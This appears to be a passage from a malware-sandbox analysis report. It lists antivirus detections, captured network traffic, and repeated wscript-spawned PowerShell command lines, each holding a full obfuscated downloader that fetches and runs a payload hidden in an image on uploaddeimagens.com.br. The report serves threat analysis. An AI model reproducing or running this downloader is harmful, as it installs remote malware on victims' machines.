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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
Symantec | CL.Downloader!gen11 |
Kaspersky | HEUR:Trojan.Script.Generic |
Ikarus | Trojan.PS.Agent |
Detected |
Data received | [ |
Data received | WereÊä.´bíÇ=¬GÈìÇ£¿î]ÝÙDOWNGRD ¾yö-¿»ÓûcmnE©µÍ¼ac{~¿SrMäs À ÿ |
Data received | Q |
Data received | |
Data received | AßÇE£Héx-Mòÿ¶ Sêèò¢aÌ-Ü3¤z_î¯ûzá",_ÃÝï<ñ¦ã·×é\¹×6 H0F! ²ülzËK{&׶ºñÌg/P}$M;$Îb! ÙÆ1ã >=¦ÕÐ¥nhu0RÃLò[åL= |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | ÷ ñXXØHÑ=ä§Èå#êM^äªZÌ$H;g£{ag´fÌ |
Data sent | y uereÂÛ£«+b¿³Å*UWa³6.43aà}óÌ / 5 ÀÀÀ À 2 8 4ÿ uploaddeimagens.com.br |
Data sent | F BA¢Tt%iùÖ1ÜÔB®MAi¡¡Åú*ÿÈ/÷¶ÃÔåpwë yÑW¸ö5MÙÉ;?+d8éh¥(~ 0[|8cé¤ÿ[ ´èvX¿Ã÷îÇs2ÅÄ ãÊç·åoûź°khíøO |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
parent_process | wscript.exe | martian_process | powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'KvHbRIwOvHbRIwOovHbRIwOCcvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOFUvHbRIwOcgBsvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOB0vHbRIwOHvHbRIwOvHbRIwOcwvHbRIwO6vHbRIwOC8vHbRIwOLwB1vHbRIwOHvHbRIwOvHbRIwObvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOBkvHbRIwOGUvHbRIwOaQvHbRIwOnvHbRIwOCsvHbRIwOJwBtvHbRIwOGEvHbRIwOZwBlvHbRIwOG4vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOcwvHbRIwOuvHbRIwOGMvHbRIwObwBtvHbRIwOC4vHbRIwOYgByvHbRIwOC8vHbRIwOaQBtvHbRIwOGEvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZwBlvHbRIwOHMvHbRIwOLwvHbRIwOwvHbRIwODvHbRIwOvHbRIwONvHbRIwOvHbRIwOvvHbRIwODYvHbRIwOOvHbRIwOvHbRIwOzvHbRIwOC8vHbRIwONwvHbRIwO3vHbRIwODkvHbRIwOLwBvvHbRIwOHIvHbRIwOaQBnvHbRIwOGkvHbRIwObgBhvHbRIwOGwvHbRIwOLwBkvHbRIwOG8vHbRIwOdwBuvHbRIwOGwvHbRIwObwBhvHbRIwOGQvHbRIwOLgBqvHbRIwOHvHbRIwOvHbRIwOZwvHbRIwO/vHbRIwODEvHbRIwONwvHbRIwOwvHbRIwODEvHbRIwOOvHbRIwOvHbRIwO3vHbRIwODgvHbRIwOOvHbRIwOvHbRIwO2vHbRIwODQvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOB3vHbRIwOGUvHbRIwOYgBDvHbRIwOGwvHbRIwOaQBlvHbRIwOG4vHbRIwOdvHbRIwOvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBOvHbRIwOGUvHbRIwOdwvHbRIwOtvHbRIwOE8vHbRIwOYgBqvHbRIwOGUvHbRIwOYwB0vHbRIwOCvHbRIwOvHbRIwOUwB5vHbRIwOHMvHbRIwOdvHbRIwOBlvHbRIwOG0vHbRIwOLgBOvHbRIwOGUvHbRIwOdvHbRIwOvHbRIwOuvHbRIwOFcvHbRIwOZQBivHbRIwOEMvHbRIwObvHbRIwOBpvHbRIwOGUvHbRIwObgB0vHbRIwODsvHbRIwOYgB1vHbRIwODvHbRIwOvHbRIwOaQBtvHbRIwOGEvHbRIwOZwBlvHbRIwOEIvHbRIwOeQB0vHbRIwOGUvHbRIwOcwvHbRIwOgvHbRIwOD0vHbRIwOIvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOB3vHbRIwOGUvHbRIwOYgBDvHbRIwOGwvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOaQBlvHbRIwOG4vHbRIwOdvHbRIwOvHbRIwOuvHbRIwOEQvHbRIwObwB3vHbRIwOG4vHbRIwObvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOBEvHbRIwOGEvHbRIwOdvHbRIwOBhvHbRIw